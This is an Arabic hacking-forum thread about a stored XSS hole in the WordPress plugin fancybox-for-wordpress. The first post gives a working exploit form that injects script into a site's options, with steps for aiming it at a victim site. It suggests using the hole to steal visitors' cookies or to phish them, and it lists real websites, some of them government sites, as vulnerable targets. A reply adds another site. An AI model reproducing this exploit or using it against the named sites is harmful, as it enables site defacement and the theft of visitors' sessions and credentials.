اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

fancybox-for-wordpress

fancybox-for-wordpress


النتائج 1 إلى 2 من 2

الموضوع: fancybox-for-wordpress

  1. #1
    هكر نشيط Array الصورة الرمزية hacker@dz
    تاريخ التسجيل
    Oct 2013
    الدولة
    no ip
    المشاركات
    195

    Newnews fancybox-for-wordpress



    السلام عليكم

    قبل ايام تم اكتشاف ثغرة في الاضافة

    fancybox-for-wordpress

    وهي اضافة مشهورة ومواقع كثيرة تستخدمها

    وحسب موقع wordpress.org فانه تم تحميل 600 الف نسخة منها

    يعني آلاف المواقع مصابة

    المهم الثغرة هي عبارة عن Stored XSS وتسمح لك باضافة اكواد html وجافاسكريبت الى الصفحة الرئيسية في الموقع..

    الاستغلال:
    كود HTML:
    <form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
        <input type="text" name="action" value="update">
        <input type="text" name="mfbfw[padding]" value="</استبدال script><استبدال script>alert(/Owned by someone/)</استبدال script>">
        <input type="submit" value="Send">
    </form>
    نقوم بتغيير الايبي الى رابط الموقع المصاب
    نستبدل Owned by someone الى اسمك مثلا:GOSTEDZ
    نفتح مستند نص ننسخ الكود ونحط الكود في المستند ونحفظه بصيغة HTML
    وبعد الاستغلال يتم تنفيذ كود الجافاسكريبت على كل زوار الموقع

    وطبعا كل واحد وكيف يتسغل هذه الثغرة مثلا في سرقة الكوكيز او phishing ...الخ

    مواقع مصابة:
    كود:
    http://foreverafter.co.il
    http://unfolding.co.il
    http://www.cws.co.il
    http://www.para-dox.co.il
    http://www.hotelsblog.co.il
    http://www.taal.gov.ph
    http://diariodeviaje.pakapaka.gob.ar 
    http://loko.pz.gov.ua
    * الثغرة ليست من اكتشافي وايضا هي ليست منشورة في مواقع الحماية والكثير لا يعلم عنها...
    الثغرة : http://1337day.com/exploit/23294 ====> 16/02/2015

    التعديل الأخير تم بواسطة [email protected] ; 02-19-2015 الساعة 01:23 PM


  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Mar 2013
    المشاركات
    23

    افتراضي رد: fancybox-for-wordpress

    www.cehat.asso.fr

    - - - تم التحديث - - -

    1-لا اختراق أبدا قبل الحماية


المواضيع المتشابهه

  1. ثغرة Wordpress 2013
    بواسطة rakan-2011 في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 07-01-2013, 09:53 PM
  2. أداة تخمين wordpress
    بواسطة Iraqe Hacker في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 0
    آخر مشاركة: 01-21-2013, 10:31 PM
  3. مشكلة في موقع مركب 3.4.1 WordPress
    بواسطة t-72 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 09-01-2012, 12:08 AM
  4. Wordpress themes (Londonlive)====> RFI & LFI
    بواسطة Ace في المنتدى قسم الثغرات
    مشاركات: 4
    آخر مشاركة: 05-15-2012, 03:50 PM
  5. شرح تركيب المدونة الشخصية WordPress-2.8.4
    بواسطة ASDELY-ScOrPiOn في المنتدى تطوير المواقع والمنتديات
    مشاركات: 3
    آخر مشاركة: 09-15-2009, 01:13 PM

وجد الزوار هذه الصفحة بالبحث عن:

مواقع مصابة بثغرة wordpress

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •